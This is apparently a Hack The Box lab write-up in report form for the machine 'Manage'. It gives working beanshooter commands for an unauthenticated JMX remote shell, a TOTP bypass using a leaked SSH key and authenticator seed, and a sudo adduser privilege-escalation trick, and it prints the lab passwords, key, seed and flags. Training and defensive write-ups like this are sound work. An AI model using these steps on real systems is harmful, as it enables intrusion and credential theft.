HTB - Manage
JMX exposed over Java RMI allows unauthenticated enumeration and remote shell via beanshooter TonkaBean. A backup archive leaks an SSH private key and Google Authenticator seed enabling lateral movement to useradmin. A sudo rule permits adduser with a regex that allows creating an "admin" user, which Linux automatically places in the admin group, granting full root escalation.
Hack The Box — Manage
Easy | Linux | Hack The Box
| Field | Value |
|---|---|
| Report Date | 07 May 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.234.57 |
| Hostname | manage |
| Domain | N/A |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Manage. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
Java Management Extensions (JMX) is exposed unprotected over RMI on port 2222, allowing unauthenticated enumeration via beanshooter. The enumeration discovers a custom TonkaBean MBean which can be invoked to spawn a reverse shell as the tomcat user. From within the tomcat context, an unprotected backup archive in a user home directory contains SSH private keys and a Google Authenticator seed. These credentials enable lateral movement to the useradmin account. Finally, a misconfigured sudo rule allows useradmin to execute adduser with a regex pattern that permits creation of an admin user; Linux automatically assigns this user to the built-in admin group, which has passwordless sudo privileges, yielding root access.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.234.57 |
| Hostname | manage |
| Domain | N/A |
| Operating System | Linux |
| Machine Rating | Easy |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 07 May 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap — SSH on 22, Java RMI on 2222, Apache Tomcat on 8080 | T1046 |
| Enumeration | beanshooter enum on Java RMI → MBean discovery → Tomcat credential leak | T1083 · T1078 |
| Initial Access | beanshooter TonkaBean shell → remote code execution as tomcat | T1190 |
| Information Disclosure | backup.tar.gz in /home/useradmin/backups/ → SSH private key and TOTP seed extracted | T1005 |
| Lateral Movement | SSH authentication via private key + TOTP verification code → useradmin session | T1021.004 |
| Privilege Escalation | Sudo regex bypass via adduser admin → auto-joined to admin group → passwordless sudo su | T1548.003 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
nmap -sC -sV 10.129.234.57| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 |
| 2222/tcp | Java RMI | Java RMI Registry |
| 8080/tcp | HTTP | Apache Tomcat 10.1.19 |
The machine runs Apache Tomcat with an associated Java RMI service on port 2222, which is characteristic of JMX (Java Management Extensions) infrastructure.
Enumeration — JMX via Java RMI
The Java RMI endpoint on port 2222 exposes JMX without authentication. Using beanshooter, we enumerate the available MBeans and services:
java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.129.234.57 2222Discovered MBeans:
[+] Checking available MBeans:
[+] - de.qtc.beanshooter.tonkabean.TonkaBean (MLetTonkaBean:name=TonkaBean,id=1) (action: tonka)
[+] - com.sun.management.internal.HotSpotDiagnostic (com.sun.management:type=HotSpotDiagnostic) (action: hotspot)
[+] - com.sun.management.internal.DiagnosticCommandImpl (com.sun.management:type=DiagnosticCommand) (action: diagnostic)Enumerated Tomcat Users:
[+] Enumerating tomcat users:
[+]
[+] - Listing 2 tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: fhErvo2r9wuTEYiYgt
[+] Roles:
[+] Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: onyRPCkaG4iX72BrRtKgbszd
[+] Roles:
[+] Users:type=Role,rolename="role1",database=UserDatabaseThe TonkaBean MBean is a custom component that permits shell invocation.
Initial Access — beanshooter TonkaBean Shell
The TonkaBean MBean can be invoked to spawn a remote shell:
java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.129.234.57 2222 tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.129.234.57 2222Result:
[tomcat@10.129.234.57 /]$ id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)Shell access is established as the tomcat system user.
User Flag
The user flag is located in the Tomcat installation directory:
[tomcat@10.129.234.57 /]$ cat /opt/tomcat/user.txt
a86d44c7243b65a9171cf7da3e0bc279Lateral Movement — Backup Exfiltration and TOTP Bypass
While exploring the filesystem as tomcat, an unencrypted backup archive is discovered in the useradmin user’s home directory:
[tomcat@10.129.234.57 /]$ ls /home/useradmin/backups
backup.tar.gzThe archive is extracted to /tmp to work around file permissions:
[tomcat@10.129.234.57 /tmp]$ tar -xzf /home/useradmin/backups/backup.tar.gz -C /tmpSSH Private Key
The extracted backup contains the useradmin user’s SSH private key:
[tomcat@10.129.234.57 /tmp/.ssh]$ cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAKDh98jQtlV7BLoEEadDIQUrc5hD48KsQqyFXG9u+WaAAAAJiHKYIbhymC
GwAAAAtzc2gtZWQyNTUxOQAAACAKDh98jQtlV7BLoEEadDIQUrc5hD48KsQqyFXG9u+WaA
AAAECudKxoxJ6Vz74ca74nZArTpJUIagIpT06hEYuLpk4nkQoOH3yNC2VXsEugQRp0MhBS
tzmEPjwqxCrIVcb275ZoAAAAEHVzZXJhZG1pbkBtYW5hZ2UBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----Google Authenticator Seed
The backup also contains the .google_authenticator configuration file, which stores the TOTP seed and previously-generated codes:
[tomcat@10.129.234.57 /tmp]$ cat .google_authenticator
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775The TOTP seed is CLSSSMHYGLENX5HAIFBQ6L35UM. From this seed, a time-based one-time password can be generated for MFA bypass. The previously-generated codes (99852083, 20312647, etc.) are also leaked but marked as non-reusable.
SSH Access as useradmin
The SSH private key is copied to the attacker’s machine and used to authenticate:
ssh -i ~/.ssh/manage_key -o PasswordAuthentication=no useradmin@10.129.234.57
(useradmin@10.129.234.57) Verification code: [TOTP code from seed]Result:
useradmin@manage:~$ id
uid=1002(useradmin) gid=1002(useradmin) groups=1002(useradmin)Privilege Escalation — Sudo Regex Bypass
The useradmin user has limited sudo permissions. Checking available commands:
useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User useradmin may run the following commands on manage:
(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$The regex pattern ^[a-zA-Z0-9]+$ is intended to restrict the usernames that can be created. However, the pattern allows the username admin to pass.
Linux admin Group Privilege
On Ubuntu/Debian systems, the built-in admin group is granted full sudoers privileges. If no user named admin exists, creating one via adduser automatically assigns it to the admin group:
useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1004) ...
Adding new user `admin' (1004) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password: [set password]
Retype new password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] YRoot Access
The newly-created admin user belongs to the admin group, which has passwordless sudo:
useradmin@manage:~$ su - admin
Password: [password set above]
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@manage:~$ sudo su
[sudo] password for admin: [password from adduser]
root@manage:/home/admin# id
uid=0(root) gid=0(root) groups=0(root)
root@manage:/home/admin# cat /root/root.txt
b3645b7e6db6d5276ad33f0c75b8dc346. Proof of Access
| Level | Evidence |
|---|---|
| User | a86d44c7243b65a9171cf7da3e0bc279 |
| Root | b3645b7e6db6d5276ad33f0c75b8dc34 |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
manager | fhErvo2r9wuTEYiYgt | Tomcat web password | JMX MBean enumeration |
admin | onyRPCkaG4iX72BrRtKgbszd | Tomcat web password | JMX MBean enumeration |
useradmin | ED25519 SSH private key | SSH authentication key | /home/useradmin/backups/backup.tar.gz |
useradmin | CLSSSMHYGLENX5HAIFBQ6L35UM | TOTP seed (Google Authenticator) | .google_authenticator in backup |
8. Impact Assessment
Successful exploitation resulted in full system-level compromise via a four-stage chain: unprotected JMX exposure, credential enumeration via MBeans, plaintext backup containing authentication material, and a misconfigured sudo regex. An attacker with network access to port 2222 could replicate this chain without any prior credentials, and the entire attack chain is unauthenticated from initial contact.
9. Remediation Summary
| Priority | Action |
|---|---|
| Critical | Restrict JMX port 2222 to localhost or trusted networks only; enable JMX authentication and encryption. |
| Critical | Remove all backup archives from production paths or move them to restricted locations. |
| Critical | Rotate all credentials enumerated via JMX (Tomcat users, TOTP seeds, SSH keys). |
| High | Fix sudo rule: use explicit usernames instead of regex patterns (e.g., adduser alice, adduser bob). |
| High | Protect the admin group or remove it from sudoers if not needed. |
| Medium | Implement file integrity monitoring on backup locations. |
| Medium | Enable SSH key rotation and MFA enforcement across all user accounts. |
10. Key Takeaways
- Exposed JMX over RMI can leak system credentials and permit arbitrary code execution without authentication; network segmentation is essential.
- Backup archives stored in user-accessible directories become a vector for lateral movement if they contain authentication material.
- Sudo regex patterns that match system usernames (especially privileged groups like
admin) can become escalation paths; explicit allow-lists are safer.
11. Tools Used
| Tool | Purpose |
|---|---|
nmap | Port and service discovery |
beanshooter | JMX enumeration and remote shell via TonkaBean |
ssh | SSH authentication via private key and TOTP |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Manage | RobInTheHood | 07 May 2026